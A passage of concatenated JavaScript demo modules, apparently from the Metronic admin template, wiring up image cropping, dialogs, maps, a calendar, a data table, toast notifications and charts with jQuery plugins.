$pimg.css({ width: Math.round(rx * boundx) + 'px', height: Math.round(ry * boundy) + 'px', marginLeft: '-' + Math.round(rx * c.x) + 'px', marginTop: '-' + Math.round(ry * c.y) + 'px' }); } }; } var demo4 = function() { var jcrop_api; $('#demo4').Jcrop({ bgFade: true, bgOpacity: .2, setSelect: [ 60, 70, 540, 330 ] },function(){ jcrop_api = this; }); $('#fadetog').change(function(){ jcrop_api.setOptions({ bgFade: this.checked }); }).attr('checked', true); App.updateUniform('#fadetog'); $('#shadetog').change(function(){ if (this.checked) $('#shadetxt').slideDown(); else $('#shadetxt').slideUp(); jcrop_api.setOptions({ shade: this.checked }); }).attr('checked', false); // Define page sections var sections = { bgc_buttons: 'Change bgColor', bgo_buttons: 'Change bgOpacity', anim_buttons: 'Animate Selection' }; // Define animation buttons var ac = { anim1: [217,122,382,284], anim2: [20,20,580,380], anim3: [24,24,176,376], anim4: [347,165,550,355], anim5: [136,55,472,183] }; // Define bgOpacity buttons var bgo = { Low: .2, Mid: .5, High: .8, Full: 1 }; // Define bgColor buttons var bgc = { R: '#900', B: '#4BB6F0', Y: '#F0B207', G: '#46B81C', W: 'white', K: 'black' }; // Create fieldset targets for buttons for(i in sections) insertSection(i,sections[i]); function create_btn(c) { var $o = $('<button />').addClass('btn small'); if (c) $o.append(c); return $o; } var a_count = 1; // Create animation buttons for(i in ac) { $('#anim_buttons .btn-group') .append( create_btn(a_count++).click(animHandler(ac[i])), ' ' ); } $('#anim_buttons .btn-group').append( create_btn('Bye!').click(function(e){ $(e.target).addClass('active'); jcrop_api.animateTo( [300,200,300,200], function(){ this.release(); $(e.target).closest('.btn-group').find('.active').removeClass('active'); } ); return false; }) ); // Create bgOpacity buttons for(i in bgo) { $('#bgo_buttons .btn-group').append( create_btn(i).click(setoptHandler('bgOpacity',bgo[i])), ' ' ); } // Create bgColor buttons for(i in bgc) { $('#bgc_buttons .btn-group').append( create_btn(i).css({ background: bgc[i], color: ((i == 'K') || (i == 'R'))?'white':'black' }).click(setoptHandler('bgColor',bgc[i])), ' ' ); } // Function to insert named sections into interface function insertSection(k,v) { $('#interface').prepend( $('<fieldset></fieldset>').attr('id',k).append( $('<h4></h4>').append(v), '<div class="btn-toolbar"><div class="btn-group"></div></div>' ) ); }; // Handler for option-setting buttons function setoptHandler(k,v) { return function(e) { $(e.target).closest('.btn-group').find('.active').removeClass('active'); $(e.target).addClass('active'); var opt = { }; opt[k] = v; jcrop_api.setOptions(opt); return false; }; }; // Handler for animation buttons function animHandler(v) { return function(e) { $(e.target).addClass('active'); jcrop_api.animateTo(v,function(){ $(e.target).closest('.btn-group').find('.active').removeClass('active'); }); return false; }; }; $('#bgo_buttons .btn:first,#bgc_buttons .btn:last').addClass('active'); $('#interface').show(); } var demo5 = function() { // The variable jcrop_api will hold a reference to the // Jcrop API once Jcrop is instantiated. var jcrop_api; // In this example, since Jcrop may be attached or detached // at the whim of the user, I've wrapped the call into a function initJcrop(); // The function is pretty simple function initJcrop()//{{{ { // Hide any interface elements that require Jcrop // (This is for the local user interface portion.) $('.requiresjcrop').hide(); // Invoke Jcrop in typical fashion $('#demo5').Jcrop({ onRelease: releaseCheck },function(){ jcrop_api = this; jcrop_api.animateTo([100,100,400,300]); // Setup and dipslay the interface for "enabled" $('#can_click,#can_move,#can_size').attr('checked','checked'); App.updateUniform('#can_click,#can_move,#can_size'); $('#ar_lock,#size_lock,#bg_swap').attr('checked',false); App.updateUniform('#ar_lock,#size_lock,#bg_swap'); $('.requiresjcrop').show(); }); }; //}}} // Use the API to find cropping dimensions // Then generate a random selection // This function is used by setSelect and animateTo buttons // Mainly for demonstration purposes function getRandom() { var dim = jcrop_api.getBounds(); return [ Math.round(Math.random() * dim[0]), Math.round(Math.random() * dim[1]), Math.round(Math.random() * dim[0]), Math.round(Math.random() * dim[1]) ]; }; // This function is bound to the onRelease handler... // In certain circumstances (such as if you set minSize // and aspectRatio together), you can inadvertently lose // the selection. This callback re-enables creating selections // in such a case. Although the need to do this is based on a // buggy behavior, it's recommended that you in some way trap // the onRelease callback if you use allowSelect: false function releaseCheck() { jcrop_api.setOptions({ allowSelect: true }); $('#can_click').attr('checked',false); App.updateUniform('#can_click'); }; // Attach interface buttons // This may appear to be a lot of code but it's simple stuff $('#setSelect').click(function(e) { // Sets a random selection jcrop_api.setSelect(getRandom()); }); $('#animateTo').click(function(e) { // Animates to a random selection jcrop_api.animateTo(getRandom()); }); $('#release').click(function(e) { // Release method clears the selection jcrop_api.release(); }); $('#disable').click(function(e) { // Disable Jcrop instance jcrop_api.disable(); // Update the interface to reflect disabled state $('#enable').show(); $('.requiresjcrop').hide(); }); $('#enable').click(function(e) { // Re-enable Jcrop instance jcrop_api.enable(); // Update the interface to reflect enabled state $('#enable').hide(); $('.requiresjcrop').show(); }); $('#rehook').click(function(e) { // This button is visible when Jcrop has been destroyed // It performs the re-attachment and updates the UI $('#rehook,#enable').hide(); initJcrop(); $('#unhook,.requiresjcrop').show(); return false; }); $('#unhook').click(function(e) { // Destroy Jcrop widget, restore original state jcrop_api.destroy(); // Update the interface to reflect un-attached state $('#unhook,#enable,.requiresjcrop').hide(); $('#rehook').show(); return false; }); // Hook up the three image-swapping buttons $('#img1').click(function(e) { $(this).addClass('active').closest('.btn-group') .find('button.active').not(this).removeClass('active'); jcrop_api.setImage('assets/plugins/jcrop/demos/demo_files/sago.jpg'); jcrop_api.setOptions({ bgOpacity: .6 }); return false; }); $('#img2').click(function(e) { $(this).addClass('active').closest('.btn-group') .find('button.active').not(this).removeClass('active'); jcrop_api.setImage('assets/plugins/jcrop/demos/demo_files/pool.jpg'); jcrop_api.setOptions({ bgOpacity: .6 }); return false; }); $('#img3').click(function(e) { $(this).addClass('active').closest('.btn-group') .find('button.active').not(this).removeClass('active'); jcrop_api.setImage('assets/plugins/jcrop/demos/demo_files/sago.jpg',function(){ this.setOptions({ bgOpacity: 1, outerImage: 'assets/plugins/jcrop/demos/demo_files/sagomod.jpg' }); this.animateTo(getRandom()); }); return false; }); // The checkboxes simply set options based on it's checked value // Options are changed by passing a new options object // Also, to prevent strange behavior, they are initially checked // This matches the default initial state of Jcrop $('#can_click').change(function(e) { jcrop_api.setOptions({ allowSelect: !!this.checked }); jcrop_api.focus(); }); $('#can_move').change(function(e) { jcrop_api.setOptions({ allowMove: !!this.checked }); jcrop_api.focus(); }); $('#can_size').change(function(e) { jcrop_api.setOptions({ allowResize: !!this.checked }); jcrop_api.focus(); }); $('#ar_lock').change(function(e) { jcrop_api.setOptions(this.checked? { aspectRatio: 4/3 }: { aspectRatio: 0 }); jcrop_api.focus(); }); $('#size_lock').change(function(e) { jcrop_api.setOptions(this.checked? { minSize: [ 80, 80 ], maxSize: [ 350, 350 ] }: { minSize: [ 0, 0 ], maxSize: [ 0, 0 ] }); jcrop_api.focus(); }); } var demo6 = function() { var api; $('#demo6').Jcrop({ // start off with jcrop-light class bgOpacity: 0.5, bgColor: 'white', addClass: 'jcrop-light' },function(){ api = this; api.setSelect([130,65,130+350,65+285]); api.setOptions({ bgFade: true }); api.ui.selection.addClass('jcrop-selection'); }); $('#buttonbar').on('click','button',function(e){ var $t = $(this), $g = $t.closest('.btn-group'); $g.find('button.active').removeClass('active'); $t.addClass('active'); $g.find('[data-setclass]').each(function(){ var $th = $(this), c = $th.data('setclass'), a = $th.hasClass('active'); if (a) { api.ui.holder.addClass(c); switch(c){ case 'jcrop-light': api.setOptions({ bgColor: 'white', bgOpacity: 0.5 }); break; case 'jcrop-dark': api.setOptions({ bgColor: 'black', bgOpacity: 0.4 }); break; case 'jcrop-normal': api.setOptions({ bgColor: $.Jcrop.defaults.bgColor, bgOpacity: $.Jcrop.defaults.bgOpacity }); break; } } else api.ui.holder.removeClass(c); }); }); } var demo7 = function() { // I did JSON.stringify(jcrop_api.tellSelect()) on a crop I liked: var c = {"x":13,"y":7,"x2":487,"y2":107,"w":474,"h":100}; $('#demo7').Jcrop({ bgFade: true, setSelect: [c.x,c.y,c.x2,c.y2] }); } var demo8 = function() { $('#demo8').Jcrop({ aspectRatio: 1, onSelect: updateCoords }); function updateCoords(c) { $('#crop_x').val(c.x); $('#crop_y').val(c.y); $('#crop_w').val(c.w); $('#crop_h').val(c.h); }; $('#demo8_form').submit(function(){ if (parseInt($('#crop_w').val())) return true; alert('Please select a crop region then press submit.'); return false; }); } var handleResponsive = function() { if ($(window).width() <= 1024 && $(window).width() >= 678) { $('.responsive-1024').each(function(){ $(this).attr("data-class", $(this).attr("class")); $(this).attr("class", 'responsive-1024 col-md-12'); }); } else { $('.responsive-1024').each(function(){ if ($(this).attr("data-class")) { $(this).attr("class", $(this).attr("data-class")); $(this).removeAttr("data-class"); } }); } } return { //main function to initiate the module init: function () { if (!jQuery().Jcrop) {; return; } App.addResponsiveHandler(handleResponsive); handleResponsive(); demo1(); demo2(); demo3(); demo4(); demo5(); demo6(); demo7(); demo8(); } }; }();
JavaScript
var Tasks = function () { return { //main function to initiate the module initDashboardWidget: function () { $('input.liChild').change(function() { if ($(this).is(':checked')) { $(this).parents('li').addClass("task-done"); } else { $(this).parents('li').removeClass("task-done"); } }); } }; }();
JavaScript
var UINestable = function () { var updateOutput = function (e) { var list = e.length ? e : $(e.target), output = list.data('output'); if (window.JSON) { output.val(window.JSON.stringify(list.nestable('serialize'))); //, null, 2)); } else { output.val('JSON browser support required for this demo.'); } }; return { //main function to initiate the module init: function () { // activate Nestable for list 1 $('#nestable_list_1').nestable({ group: 1 }) .on('change', updateOutput); // activate Nestable for list 2 $('#nestable_list_2').nestable({ group: 1 }) .on('change', updateOutput); // output initial serialised data updateOutput($('#nestable_list_1').data('output', $('#nestable_list_1_output'))); updateOutput($('#nestable_list_2').data('output', $('#nestable_list_2_output'))); $('#nestable_list_menu').on('click', function (e) { var target = $(e.target), action = target.data('action'); if (action === 'expand-all') { $('.dd').nestable('expandAll'); } if (action === 'collapse-all') { $('.dd').nestable('collapseAll'); } }); $('#nestable_list_3').nestable(); } }; }();
JavaScript
var ComponentsKnobDials = function () { return { //main function to initiate the module init: function () { //knob does not support ie8 so skip it if (!jQuery().knob || App.isIE8()) { return; } // general knob $(".knob").knob({ 'dynamicDraw': true, 'thickness': 0.2, 'tickColorizeValues': true, 'skin': 'tron' }); } }; }();
JavaScript
var UIAlertDialogApi = function () { var handleDialogs = function() { $('#demo_1').click(function(){ bootbox.alert("Hello world!"); }); //end #demo_1 $('#demo_2').click(function(){ bootbox.alert("Hello world!", function() { alert("Hello world callback"); }); }); //end #demo_2 $('#demo_3').click(function(){ bootbox.confirm("Are you sure?", function(result) { alert("Confirm result: "+result); }); }); //end #demo_3 $('#demo_4').click(function(){ bootbox.prompt("What is your name?", function(result) { if (result === null) { alert("Prompt dismissed"); } else { alert("Hi <b>"+result+"</b>"); } }); }); //end #demo_6 $('#demo_5').click(function(){ bootbox.dialog({ message: "I am a custom dialog", title: "Custom title", buttons: { success: { label: "Success!", className: "green", callback: function() { alert("great success"); } }, danger: { label: "Danger!", className: "red", callback: function() { alert("uh oh, look out!"); } }, main: { label: "Click ME!", className: "blue", callback: function() { alert("Primary button"); } } } }); }); //end #demo_7 } var handleAlerts = function() { $('#alert_show').click(function(){ App.alert({ container: $('#alert_container').val(), // alerts parent container(by default placed after the page breadcrumbs) place: $('#alert_place').val(), // append or prepent in container type: $('#alert_type').val(), // alert's type message: $('#alert_message').val(), // alert's message close: $('#alert_close').is(":checked"), // make alert closable reset: $('#alert_reset').is(":checked"), // close all previouse alerts first focus: $('#alert_focus').is(":checked"), // auto scroll to the alert after shown closeInSeconds: $('#alert_close_in_seconds').val(), // auto close after defined seconds icon: $('#alert_icon').val() // put icon before the message }); }); } return { //main function to initiate the module init: function () { handleDialogs(); handleAlerts(); } }; }();
JavaScript
var Lock = function () { return { //main function to initiate the module init: function () { $.backstretch([ "assets/img/bg/1.jpg", "assets/img/bg/2.jpg", "assets/img/bg/3.jpg", "assets/img/bg/4.jpg" ], { fade: 1000, duration: 8000 }); } }; }();
JavaScript
var ContactUs = function () { return { //main function to initiate the module init: function () { var map; $(document).ready(function(){ map = new GMaps({ div: '#map', lat: -13.004333, lng: -38.494333 }); var marker = map.addMarker({ lat: -13.004333, lng: -38.494333, title: 'Loop, Inc.', infoWindow: { content: "<b>Loop, Inc.</b> 795 Park Ave, Suite 120<br>San Francisco, CA 94107" } }); marker.infoWindow.open(map, marker); }); } }; }();
JavaScript
var MapsGoogle = function () { var mapBasic = function () { new GMaps({ div: '#gmap_basic', lat: -12.043333, lng: -77.028333 }); } var mapMarker = function () { var map = new GMaps({ div: '#gmap_marker', lat: -12.043333, lng: -77.028333 }); map.addMarker({ lat: -12.043333, lng: -77.03, title: 'Lima', details: { database_id: 42, author: 'HPNeo' }, click: function (e) { if (console.log) console.log(e); alert('You clicked in this marker'); } }); map.addMarker({ lat: -12.042, lng: -77.028333, title: 'Marker with InfoWindow', infoWindow: { content: '<span style="color:#000">HTML Content!</span>' } }); } var mapPolylines = function () { var map = new GMaps({ div: '#gmap_polylines', lat: -12.043333, lng: -77.028333, click: function (e) { console.log(e); } }); path = [ [-12.044012922866312, -77.02470665341184], [-12.05449279282314, -77.03024273281858], [-12.055122327623378, -77.03039293652341], [-12.075917129727586, -77.02764635449216], [-12.07635776902266, -77.02792530422971], [-12.076819390363665, -77.02893381481931], [-12.088527520066453, -77.0241058385925], [-12.090814532191756, -77.02271108990476] ]; map.drawPolyline({ path: path, strokeColor: '#131540', strokeOpacity: 0.6, strokeWeight: 6 }); } var mapGeolocation = function () { var map = new GMaps({ div: '#gmap_geo', lat: -12.043333, lng: -77.028333 }); GMaps.geolocate({ success: function (position) { map.setCenter(position.coords.latitude, position.coords.longitude); }, error: function (error) { alert('Geolocation failed: ' + error.message); }, not_supported: function () { alert("Your browser does not support geolocation"); }, always: function () { //alert("Geolocation Done!"); } }); } var mapGeocoding = function () { var map = new GMaps({ div: '#gmap_geocoding', lat: -12.043333, lng: -77.028333 }); var handleAction = function () { var text = $.trim($('#gmap_geocoding_address').val()); GMaps.geocode({ address: text, callback: function (results, status) { if (status == 'OK') { var latlng = results[0].geometry.location; map.setCenter(latlng.lat(), latlng.lng()); map.addMarker({ lat: latlng.lat(), lng: latlng.lng() }); App.scrollTo($('#gmap_geocoding')); } } }); } $('#gmap_geocoding_btn').click(function (e) { e.preventDefault(); handleAction(); }); $("#gmap_geocoding_address").keypress(function (e) { var keycode = (e.keyCode ? e.keyCode : e.which); if (keycode == '13') { e.preventDefault(); handleAction(); } }); } var mapPolygone = function () { var map = new GMaps({ div: '#gmap_polygons', lat: -12.043333, lng: -77.028333 }); var path = [ [-12.040397656836609, -77.03373871559225], [-12.040248585302038, -77.03993927003302], [-12.050047116528843, -77.02448169303511], [-12.044804866577001, -77.02154422636042] ]; var polygon = map.drawPolygon({ paths: path, strokeColor: '#BBD8E9', strokeOpacity: 1, strokeWeight: 3, fillColor: '#BBD8E9', fillOpacity: 0.6 }); } var mapRoutes = function () { var map = new GMaps({ div: '#gmap_routes', lat: -12.043333, lng: -77.028333 }); $('#gmap_routes_start').click(function (e) { e.preventDefault(); App.scrollTo($(this), 400); map.travelRoute({ origin: [-12.044012922866312, -77.02470665341184], destination: [-12.090814532191756, -77.02271108990476], travelMode: 'driving', step: function (e) { $('#gmap_routes_instructions').append('<li>' + e.instructions + '</li>'); $('#gmap_routes_instructions li:eq(' + e.step_number + ')').delay(800 * e.step_number).fadeIn(500, function () { map.setCenter(e.end_location.lat(), e.end_location.lng()); map.drawPolyline({ path: e.path, strokeColor: '#131540', strokeOpacity: 0.6, strokeWeight: 6 }); }); } }); }); } return { //main function to initiate map samples init: function () { mapBasic(); mapMarker(); mapGeolocation(); mapGeocoding(); mapPolylines(); mapPolygone(); mapRoutes(); } }; }();
JavaScript
var Calendar = function () { return { //main function to initiate the module init: function () { Calendar.initCalendar(); }, initCalendar: function () { if (!jQuery().fullCalendar) { return; } var date = new Date(); var d = date.getDate(); var m = date.getMonth(); var y = date.getFullYear(); var h = {}; if (App.isRTL()) { if ($('#calendar').parents(".portlet").width() <= 720) { $('#calendar').addClass("mobile"); h = { right: 'title, prev, next', center: '', right: 'agendaDay, agendaWeek, month, today' }; } else { $('#calendar').removeClass("mobile"); h = { right: 'title', center: '', left: 'agendaDay, agendaWeek, month, today, prev,next' }; } } else { if ($('#calendar').parents(".portlet").width() <= 720) { $('#calendar').addClass("mobile"); h = { left: 'title, prev, next', center: '', right: 'today,month,agendaWeek,agendaDay' }; } else { $('#calendar').removeClass("mobile"); h = { left: 'title', center: '', right: 'prev,next,today,month,agendaWeek,agendaDay' }; } } var initDrag = function (el) { // create an Event Object (http://arshaw.com/fullcalendar/docs/event_data/Event_Object/) // it doesn't need to have a start or end var eventObject = { title: $.trim(el.text()) // use the element's text as the event title }; // store the Event Object in the DOM element so we can get to it later el.data('eventObject', eventObject); // make the event draggable using jQuery UI el.draggable({ zIndex: 999, revert: true, // will cause the event to go back to its revertDuration: 0 // original position after the drag }); } var addEvent = function (title) { title = title.length == 0 ? "Untitled Event" : title; var html = $('<div class="external-event label label-default">' + title + '</div>'); jQuery('#event_box').append(html); initDrag(html); } $('#external-events div.external-event').each(function () { initDrag($(this)) }); $('#event_add').unbind('click').click(function () { var title = $('#event_title').val(); addEvent(title); }); //predefined events $('#event_box').html(""); addEvent("My Event 1"); addEvent("My Event 2"); addEvent("My Event 3"); addEvent("My Event 4"); addEvent("My Event 5"); addEvent("My Event 6"); $('#calendar').fullCalendar('destroy'); // destroy the calendar $('#calendar').fullCalendar({ //re-initialize the calendar header: h, slotMinutes: 15, editable: true, droppable: true, // this allows things to be dropped onto the calendar !!! drop: function (date, allDay) { // this function is called when something is dropped // retrieve the dropped element's stored Event Object var originalEventObject = $(this).data('eventObject'); // we need to copy it, so that multiple events don't have a reference to the same object var copiedEventObject = $.extend({}, originalEventObject); // assign it the date that was reported copiedEventObject.start = date; copiedEventObject.allDay = allDay; copiedEventObject.className = $(this).attr("data-class"); // render the event on the calendar // the last `true` argument determines if the event "sticks" (http://arshaw.com/fullcalendar/docs/event_rendering/renderEvent/) $('#calendar').fullCalendar('renderEvent', copiedEventObject, true); // is the "remove after drop" checkbox checked? if ($('#drop-remove').is(':checked')) { // if so, remove the element from the "Draggable Events" list $(this).remove(); } }, events: [{ title: 'All Day Event', start: new Date(y, m, 1), backgroundColor: App.getLayoutColorCode('yellow') }, { title: 'Long Event', start: new Date(y, m, d - 5), end: new Date(y, m, d - 2), backgroundColor: App.getLayoutColorCode('green') }, { title: 'Repeating Event', start: new Date(y, m, d - 3, 16, 0), allDay: false, backgroundColor: App.getLayoutColorCode('red') }, { title: 'Repeating Event', start: new Date(y, m, d + 4, 16, 0), allDay: false, backgroundColor: App.getLayoutColorCode('green') }, { title: 'Meeting', start: new Date(y, m, d, 10, 30), allDay: false, }, { title: 'Lunch', start: new Date(y, m, d, 12, 0), end: new Date(y, m, d, 14, 0), backgroundColor: App.getLayoutColorCode('grey'), allDay: false, }, { title: 'Birthday Party', start: new Date(y, m, d + 1, 19, 0), end: new Date(y, m, d + 1, 22, 30), backgroundColor: App.getLayoutColorCode('purple'), allDay: false, }, { title: 'Click for Google', start: new Date(y, m, 28), end: new Date(y, m, 29), backgroundColor: App.getLayoutColorCode('yellow'), url: 'http://google.com/', } ] }); } }; }();
JavaScript
var Portfolio = function () { return { //main function to initiate the module init: function () { $('.mix-grid').mixitup(); } }; }();
JavaScript
var TableAjax = function () { var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); } var handleRecords = function() { var grid = new Datatable(); grid.init({ src: $("#datatable_ajax"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { // here you can define a typical datatable settings from http://datatables.net/usage/options /* By default the ajax datatable's layout is horizontally scrollable and this can cause an issue of dropdown menu is used in the table rows which. Use below "sDom" value for the datatable layout if you want to have a dropdown menu for each row in the datatable. But this disables the horizontal scroll. */ //"sDom" : "<'row'<'col-md-8 col-sm-12'pli><'col-md-4 col-sm-12'<'table-group-actions pull-right'>>r>t<'row'<'col-md-8 col-sm-12'pli><'col-md-4 col-sm-12'>r>>", "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, // default record count per page "bServerSide": true, // server side processing "sAjaxSource": "demo/table_ajax.php", // ajax source "aaSorting": [[ 1, "asc" ]] // set first column as a default sort by asc } }); // handle group actionsubmit button click grid.getTableWrapper().on('click', '.table-group-action-submit', function(e){ e.preventDefault(); var action = $(".table-group-action-input", grid.getTableWrapper()); if (action.val() != "" && grid.getSelectedRowsCount() > 0) { grid.addAjaxParam("sAction", "group_action"); grid.addAjaxParam("sGroupActionName", action.val()); var records = grid.getSelectedRows(); for (var i in records) { grid.addAjaxParam(records[i]["name"], records[i]["value"]); } grid.getDataTable().fnDraw(); grid.clearAjaxParams(); } else if (action.val() == "") { App.alert({type: 'danger', icon: 'warning', message: 'Please select an action', container: grid.getTableWrapper(), place: 'prepend'}); } else if (grid.getSelectedRowsCount() === 0) { App.alert({type: 'danger', icon: 'warning', message: 'No record selected', container: grid.getTableWrapper(), place: 'prepend'}); } }); } return { //main function to initiate the module init: function () { initPickers(); handleRecords(); } }; }();
JavaScript
var UIToastr = function () { return { //main function to initiate the module init: function () { var i = -1, toastCount = 0, $toastlast, getMessage = function () { var msgs = ['Hello, some notification sample goes here', '<div><input class="form-control input-small" value="textbox"/>&nbsp;<a href="http://themeforest.net/item/metronic-responsive-admin-dashboard-template/4021469?ref=keenthemes" target="_blank">Check this out</a></div><div><button type="button" id="okBtn" class="btn blue">Close me</button><button type="button" id="surpriseBtn" class="btn default" style="margin: 0 8px 0 8px">Surprise me</button></div>', 'Did you like this one ? :)', 'Totally Awesome!!!', 'Yeah, this is the Metronic!', 'Explore the power of Metronic. Purchase it now!' ]; i++; if (i === msgs.length) { i = 0; } return msgs[i]; }; $('#showtoast').click(function () { var shortCutFunction = $("#toastTypeGroup input:checked").val(); var msg = $('#message').val(); var title = $('#title').val() || ''; var $showDuration = $('#showDuration'); var $hideDuration = $('#hideDuration'); var $timeOut = $('#timeOut'); var $extendedTimeOut = $('#extendedTimeOut'); var $showEasing = $('#showEasing'); var $hideEasing = $('#hideEasing'); var $showMethod = $('#showMethod'); var $hideMethod = $('#hideMethod'); var toastIndex = toastCount++; toastr.options = { closeButton: $('#closeButton').prop('checked'), debug: $('#debugInfo').prop('checked'), positionClass: $('#positionGroup input:checked').val() || 'toast-top-right', onclick: null }; if ($('#addBehaviorOnToastClick').prop('checked')) { toastr.options.onclick = function () { alert('You can perform some custom action after a toast goes away'); }; } if ($showDuration.val().length) { toastr.options.showDuration = $showDuration.val(); } if ($hideDuration.val().length) { toastr.options.hideDuration = $hideDuration.val(); } if ($timeOut.val().length) { toastr.options.timeOut = $timeOut.val(); } if ($extendedTimeOut.val().length) { toastr.options.extendedTimeOut = $extendedTimeOut.val(); } if ($showEasing.val().length) { toastr.options.showEasing = $showEasing.val(); } if ($hideEasing.val().length) { toastr.options.hideEasing = $hideEasing.val(); } if ($showMethod.val().length) { toastr.options.showMethod = $showMethod.val(); } if ($hideMethod.val().length) { toastr.options.hideMethod = $hideMethod.val(); } if (!msg) { msg = getMessage(); } $("#toastrOptions").text("Command: toastr[" + shortCutFunction + "](\"" + msg + (title ? "\", \"" + title : '') + "\")\n\ntoastr.options = " + JSON.stringify(toastr.options, null, 2)); var $toast = toastr[shortCutFunction](msg, title); // Wire up an event handler to a button in the toast, if it exists $toastlast = $toast; if ($toast.find('#okBtn').length) { $toast.delegate('#okBtn', 'click', function () { alert('you clicked me. i was toast #' + toastIndex + '. goodbye!'); $toast.remove(); }); } if ($toast.find('#surpriseBtn').length) { $toast.delegate('#surpriseBtn', 'click', function () { alert('Surprise! you clicked me. i was toast #' + toastIndex + '. You could perform an action here.'); }); } $('#clearlasttoast').click(function () { toastr.clear($toastlast); }); }); $('#cleartoasts').click(function () { toastr.clear(); }); } }; }();
JavaScript
var Charts = function () { return { //main function to initiate the module init: function () { App.addResponsiveHandler(function () { Charts.initPieCharts(); }); }, initCharts: function () { if (!jQuery.plot) { return; } var data = []; var totalPoints = 250; // random data generator for plot charts function getRandomData() { if (data.length > 0) data = data.slice(1); // do a random walk while (data.length < totalPoints) { var prev = data.length > 0 ? data[data.length - 1] : 50; var y = prev + Math.random() * 10 - 5; if (y < 0) y = 0; if (y > 100) y = 100; data.push(y); } // zip the generated y values with the x values var res = []; for (var i = 0; i < data.length; ++i) res.push([i, data[i]]) return res; } //Basic Chart function chart1() { var d1 = []; for (var i = 0; i < Math.PI * 2; i += 0.25) d1.push([i, Math.sin(i)]); var d2 = []; for (var i = 0; i < Math.PI * 2; i += 0.25) d2.push([i, Math.cos(i)]); var d3 = []; for (var i = 0; i < Math.PI * 2; i += 0.1) d3.push([i, Math.tan(i)]); $.plot($("#chart_1"), [{ label: "sin(x)", data: d1, lines: { lineWidth: 1, }, shadowSize: 0 }, { label: "cos(x)", data: d2, lines: { lineWidth: 1, }, shadowSize: 0 }, { label: "tan(x)", data: d3, lines: { lineWidth: 1, }, shadowSize: 0 } ], { series: { lines: { show: true, }, points: { show: true, fill: true, radius: 3, lineWidth: 1 } }, xaxis: { tickColor: "#eee", ticks: [0, [Math.PI / 2, "\u03c0/2"], [Math.PI, "\u03c0"], [Math.PI * 3 / 2, "3\u03c0/2"], [Math.PI * 2, "2\u03c0"] ] }, yaxis: { tickColor: "#eee", ticks: 10, min: -2, max: 2 }, grid: { borderColor: "#eee", borderWidth: 1 } }); } //Interactive Chart function chart2() { function randValue() { return (Math.floor(Math.random() * (1 + 40 - 20))) + 20; } var pageviews = [ [1, randValue()], [2, randValue()], [3, 2 + randValue()], [4, 3 + randValue()], [5, 5 + randValue()], [6, 10 + randValue()], [7, 15 + randValue()], [8, 20 + randValue()], [9, 25 + randValue()], [10, 30 + randValue()], [11, 35 + randValue()], [12, 25 + randValue()], [13, 15 + randValue()], [14, 20 + randValue()], [15, 45 + randValue()], [16, 50 + randValue()], [17, 65 + randValue()], [18, 70 + randValue()], [19, 85 + randValue()], [20, 80 + randValue()], [21, 75 + randValue()], [22, 80 + randValue()], [23, 75 + randValue()], [24, 70 + randValue()], [25, 65 + randValue()], [26, 75 + randValue()], [27, 80 + randValue()], [28, 85 + randValue()], [29, 90 + randValue()], [30, 95 + randValue()] ]; var visitors = [ [1, randValue() - 5], [2, randValue() - 5], [3, randValue() - 5], [4, 6 + randValue()], [5, 5 + randValue()], [6, 20 + randValue()], [7, 25 + randValue()], [8, 36 + randValue()], [9, 26 + randValue()], [10, 38 + randValue()], [11, 39 + randValue()], [12, 50 + randValue()], [13, 51 + randValue()], [14, 12 + randValue()], [15, 13 + randValue()], [16, 14 + randValue()], [17, 15 + randValue()], [18, 15 + randValue()], [19, 16 + randValue()], [20, 17 + randValue()], [21, 18 + randValue()], [22, 19 + randValue()], [23, 20 + randValue()], [24, 21 + randValue()], [25, 14 + randValue()], [26, 24 + randValue()], [27, 25 + randValue()], [28, 26 + randValue()], [29, 27 + randValue()], [30, 31 + randValue()] ]; var plot = $.plot($("#chart_2"), [{ data: pageviews, label: "Unique Visits", lines: { lineWidth: 1, }, shadowSize: 0 }, { data: visitors, label: "Page Views", lines: { lineWidth: 1, }, shadowSize: 0 } ], { series: { lines: { show: true, lineWidth: 2, fill: true, fillColor: { colors: [{ opacity: 0.05 }, { opacity: 0.01 } ] } }, points: { show: true, radius: 3, lineWidth: 1 }, shadowSize: 2 }, grid: { hoverable: true, clickable: true, tickColor: "#eee", borderColor: "#eee", borderWidth: 1 }, colors: ["#d12610", "#37b7f3", "#52e136"], xaxis: { ticks: 11, tickDecimals: 0, tickColor: "#eee", }, yaxis: { ticks: 11, tickDecimals: 0, tickColor: "#eee", } }); function showTooltip(x, y, contents) { $('<div id="tooltip">' + contents + '</div>').css({ position: 'absolute', display: 'none', top: y + 5, left: x + 15, border: '1px solid #333', padding: '4px', color: '#fff', 'border-radius': '3px', 'background-color': '#333', opacity: 0.80 }).appendTo("body").fadeIn(200); } var previousPoint = null; $("#chart_2").bind("plothover", function (event, pos, item) { $("#x").text(pos.x.toFixed(2)); $("#y").text(pos.y.toFixed(2)); if (item) { if (previousPoint != item.dataIndex) { previousPoint = item.dataIndex; $("#tooltip").remove(); var x = item.datapoint[0].toFixed(2), y = item.datapoint[1].toFixed(2); showTooltip(item.pageX, item.pageY, item.series.label + " of " + x + " = " + y); } } else { $("#tooltip").remove(); previousPoint = null; } }); } //Tracking Curves function chart3() { //tracking curves: var sin = [], cos = []; for (var i = 0; i < 14; i += 0.1) { sin.push([i, Math.sin(i)]); cos.push([i, Math.cos(i)]); } plot = $.plot($("#chart_3"), [{ data: sin, label: "sin(x) = -0.00", lines: { lineWidth: 1, }, shadowSize: 0 }, { data: cos, label: "cos(x) = -0.00", lines: { lineWidth: 1, }, shadowSize: 0 } ], { series: { lines: { show: true } }, crosshair: { mode: "x" }, grid: { hoverable: true, autoHighlight: false, tickColor: "#eee", borderColor: "#eee", borderWidth: 1 }, yaxis: { min: -1.2, max: 1.2 } }); var legends = $("#chart_3 .legendLabel"); legends.each(function () { // fix the widths so they don't jump around $(this).css('width', $(this).width()); }); var updateLegendTimeout = null; var latestPosition = null; function updateLegend() { updateLegendTimeout = null; var pos = latestPosition; var axes = plot.getAxes(); if (pos.x < axes.xaxis.min || pos.x > axes.xaxis.max || pos.y < axes.yaxis.min || pos.y > axes.yaxis.max) return; var i, j, dataset = plot.getData(); for (i = 0; i < dataset.length; ++i) { var series = dataset[i]; // find the nearest points, x-wise for (j = 0; j < series.data.length; ++j) if 